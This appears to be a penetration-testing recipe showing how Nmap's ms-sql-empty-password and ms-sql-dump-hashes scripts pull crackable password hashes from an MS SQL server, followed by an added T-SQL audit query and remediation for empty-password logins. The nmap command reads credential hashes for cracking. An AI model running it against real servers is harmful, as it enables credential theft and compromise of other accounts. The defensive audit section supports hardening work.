Dumping the password hashes of an MS SQL server

After gaining access to an MS SQL server, we can dump all of its password hashes to compromise other accounts. Nmap can help us retrieve these hashes in a format usable by the cracking tool John the Ripper.

This recipe shows how to dump crackable password hashes of an MS SQL server with Nmap.

How to do it...

To dump all the password hashes of an MS SQL server with an empty sysadmin password, run the following Nmap command:

$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>

The password hashes will be included in the ms-sql-dump-hashes script output section:

PORT     STATE SERVICE  VERSION 
1433/tcp open  ms-sql-s Microsoft SQL Server 2011 
Service Info: CPE: cpe:/o:microsoft:windows ...
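The recipe depends on a sysadmin login with an empty password. As an added defensive check that is not part of the original recipe, the following T-SQL, run by an administrator on the instance, lists every SQL login whose password is empty (via PWDCOMPARE against the stored hash) and flags which of them are sysadmin members, so the precondition can be found and fixed before a scan like the one above finds it:

```sql
-- Added audit query (not from the original recipe).
-- Lists SQL-authenticated logins whose stored hash matches the empty
-- password, and whether each is a member of the sysadmin server role.
-- Requires VIEW ANY DEFINITION / CONTROL SERVER to read password_hash.
SELECT
    l.name                                   AS login_name,
    l.is_disabled,
    CASE WHEN PWDCOMPARE(N'', l.password_hash) = 1
         THEN 'EMPTY' ELSE 'set' END         AS password_state,
    IS_SRVROLEMEMBER('sysadmin', l.name)     AS is_sysadmin
FROM sys.sql_logins AS l
WHERE PWDCOMPARE(N'', l.password_hash) = 1   -- empty password
ORDER BY is_sysadmin DESC, l.name;

-- Remediation for a flagged login: set a strong password and enforce
-- policy. <login_name> and <StrongPassword> are placeholders.
-- ALTER LOGIN [<login_name>] WITH PASSWORD = N'<StrongPassword>',
--     CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
```

A login that appears in this result with is_sysadmin = 1 is exactly what the ms-sql-empty-password script reports, and the same row set should be empty after remediation.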
